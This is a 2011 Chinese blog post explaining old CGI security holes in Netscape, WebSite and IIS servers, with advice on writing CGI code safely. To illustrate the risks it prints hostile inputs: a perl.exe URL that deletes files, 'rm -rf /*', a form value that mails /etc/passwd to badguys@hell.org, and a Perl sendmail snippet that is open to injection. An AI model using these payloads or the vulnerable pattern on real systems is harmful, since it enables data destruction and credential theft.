ITPub博客

首页 > 大数据 > 数据挖掘 > Web安全技术与防火墙(中)

Web安全技术与防火墙(中)

数据挖掘 作者:liangls1982 时间:2011-04-10 17:29:00 0 删除 编辑
计算机的安全性历来都是人们讨论的主要话题之一。而计算机安全 主要研 究的是计算机病毒的防治和系统的安全。在计算机网络日益扩展 和普及的今天, 计算机安全的要求更高,涉及面更广。不但要求防治病 毒,还要提高系统抵抗外 来非法黑客入侵的能力,还要提高对远程数据 传输的保密性,避免在传输途中遭受非法窃取。
  在防治网络病毒方面,在http传输中HTML文件是一般不会存在感染 病毒的 危险。危险在于下载可执行软件如:.zip .exe .arj .Z 等文件 过程中应特别 加以注意。都有潜伏病毒的可能性。
  对于系统本身安全性,主要考虑服务器自身稳定性、健状性,增强 自身抵抗 能力,杜绝一切可能让黑客入侵的渠道,避免造成对系统的威 胁。对重要商业应 用,必须加上防火墙和数据加密技术加以保护。
  在数据加密方面,更重要的是不断提高和改进数据加密技术,使不 法分子难 有可乘之机。
  当然,计算机系统安全是个很大的范畴,本章仅仅讨论在构造 web 时,可能 出现的一些情况,希望能引起重视。

步骤/方法

  1. 1
    Perl解释器的漏洞
      Netscape Communications Server中无法识别cgi-bin下的扩展名 及其应 用关系,如:.pl是PERL的代码程序自动调用 perl.exe文件解 释,即使现在也只 能把perl.exe文件存放在cgi-bin目录之下。执行 如: /cgi-bin/perl.exe?&my_script.pl. 但是这就给任何人都有执行 perl 的可能, 当有些人在其浏览器的URL中加上如: /cgi-bin/perl.exe?&-e+unlink+%3C*%3E 时,有可能造成删除服务器当 前目录下文件的危险。但是,其他如:O'Reilly WebSite或Purveyor都 不存在这种漏洞。
      〖2〗CGI执行批处理文件的漏洞
      文件名:test.bat:
      @echo off
      echo Content-type: text/plain
      echo
      echo Hello World!
      如果客户浏览器的URL为:/cgi-bin/test.bat?&dir则执行调用命 令解释 器完成dir列表。这给访问者有执行其他命令可能性。
      2)O'Reilly WebSite server for Windows NT/95
      在WebSite1.1B以前的版本中使用配处理文件存在着Netscape同样 的漏洞, 但是,新版关闭.bat在cgi中的作用。支持perl,VB和C作为CGI 开发工具。至于 他的安全问题参看: http://website.ora.com/devcomer/secalert1。
      3)Microsoft's IIS Web Server
      在96年3月5日前的IIS在NT下的.bat CGI的 bug甚至比其他更严 重,可以 任意使用command命令。但之后修补该漏洞。你可检查你的可 执行文件的建立日 期。IIS3.0还存在一些安全bug,主要是cgi-bin下的 覆给权利。
      另外,许多 WEB服务器本身都存在一些安全上的漏洞,都是在版本 升级过 程不断更新。在这就不一一列举。
      
  2. 2
    从CGI编程角度考虑安全:
      1〕采用编译语言比解释语言会更安全些,并且 CGI程序应放在独 立于HTML 存放目录之外的CGI-BIN下,是为了防止一些非法访问者从浏览 器端取得解释性语 言的原代码后从中寻找漏洞。
      2〕在用C来编写CGI程序时尽量少用popen(), system()和所有涉 及/bin/sh 的shell命令。在Perl中system(), exec(), open(),eval() 等exec或eval之类命 令。在由用户填写的form还回cgi时,不要直接调 用system()之类函数。这是为避 免当填写内容为“rm -rf /*”或 “/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org< /etc/passwd”之类内容。
      3〕用Perl编写CGI时如:
      $mail_to = &get_name_from_input;
      open (MAIL,"| /usr/lib/sendmail $mail_to");
      print MAIL "To: $mailto From: me Hi there! ";
      close MAIL;
      该小程序是把客户浏览器的form到服务器的mail处理程序。
    END

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/23201580/viewspace-1113542/,如需转载,请注明出处,否则将追究法律责任。

上一篇: 没有了~
下一篇: 没有了~
请登录后发表评论 登录
全部评论

注册时间:2010-01-18